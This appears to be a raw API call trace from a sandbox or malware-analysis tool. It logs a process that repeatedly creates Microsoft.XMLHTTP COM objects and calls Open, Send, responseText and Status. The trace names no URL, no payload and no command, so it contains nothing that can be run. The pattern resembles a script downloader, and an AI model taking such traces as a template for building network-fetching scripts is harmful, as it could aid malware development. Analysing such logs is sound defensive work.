	[0905.418] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7240) returned 0x0
	[0905.418] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0905.418] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7240, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72a8) returned 0x0
	[0905.418] ??2@YAPEAX_K@Z () returned 0x62f310
	[0905.418] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72a8, pUnkSite=0x62f310) 
	[0905.418] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0905.418] XMLHTTPRequest:IUnknown:Release (This=0x49c72a8) returned 0x0
	[0905.418] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7240, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7240) returned 0x0
	[0905.418] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7240) returned 0x3
	[0905.418] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7240, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0905.418] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7240, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0905.419] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7240, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0905.419] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0905.419] SysStringLen (param_1=0x0) returned 0x0
	[0905.419] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0905.419] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0905.419] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b80) returned 0x0
	[0905.419] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0905.419] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5be8) returned 0x0
	[0905.419] ??2@YAPEAX_K@Z () returned 0x62f330
	[0905.419] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5be8, pUnkSite=0x62f330) 
	[0905.419] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0905.419] XMLHTTPRequest:IUnknown:Release (This=0x49c5be8) returned 0x0
	[0905.419] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b80) returned 0x0
	[0905.420] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b80) returned 0x3
	[0905.420] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0905.420] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b80, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0905.420] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0905.420] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0905.420] SysStringLen (param_1=0x0) returned 0x0
	[0905.420] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0905.420] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0905.420] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c72a0) returned 0x0
	[0905.420] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0905.420] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0905.421] ??2@YAPEAX_K@Z () returned 0x62f310
	[0905.421] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f310) 
	[0905.421] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0905.421] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0905.421] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c72a0) returned 0x0
	[0905.421] XMLHTTPRequest:IUnknown:AddRef (This=0x49c72a0) returned 0x3
	[0905.421] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0905.421] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c72a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0905.421] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c72a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0905.421] longjmp () 
	[0905.421] longjmp () 
	[0905.422] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0905.422] SysStringLen (param_1=0x0) returned 0x0
	[0905.422] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0905.422] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0905.422] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7240) returned 0x0
	[0905.422] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0905.422] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7240, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5be8) returned 0x0
	[0905.422] ??2@YAPEAX_K@Z () returned 0x62f330
	[0905.422] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5be8, pUnkSite=0x62f330) 
	[0905.422] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0905.422] XMLHTTPRequest:IUnknown:Release (This=0x49c5be8) returned 0x0
	[0905.422] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7240, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7240) returned 0x0
	[0905.422] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7240) returned 0x3
	[0905.422] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7240, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0905.423] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7240, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0905.423] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7240, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0905.423] longjmp () 
	[0905.423] longjmp () 
	[0905.423] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0905.423] SysStringLen (param_1=0x0) returned 0x0
	[0905.423] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0905.423] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0905.423] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7300) returned 0x0
	[0905.423] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0905.424] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0905.424] ??2@YAPEAX_K@Z () returned 0x62f310
	[0905.424] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0905.424] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0905.424] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0905.424] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7300) returned 0x0
	[0905.424] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7300) returned 0x3
	[0905.424] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0905.424] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7300, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0905.424] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0905.424] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0905.425] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7300, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0905.425] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0906.226] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0906.226] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7300, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0906.226] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0906.226] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0906.226] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7300, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0906.226] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0914.181] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0914.182] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7300, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0914.182] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0914.183] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0914.183] SysStringLen (param_1=0x0) returned 0x0
	[0914.183] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0914.183] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0914.183] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7300) returned 0x0
	[0914.183] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0914.183] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0914.184] ??2@YAPEAX_K@Z () returned 0x62f310
	[0914.184] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
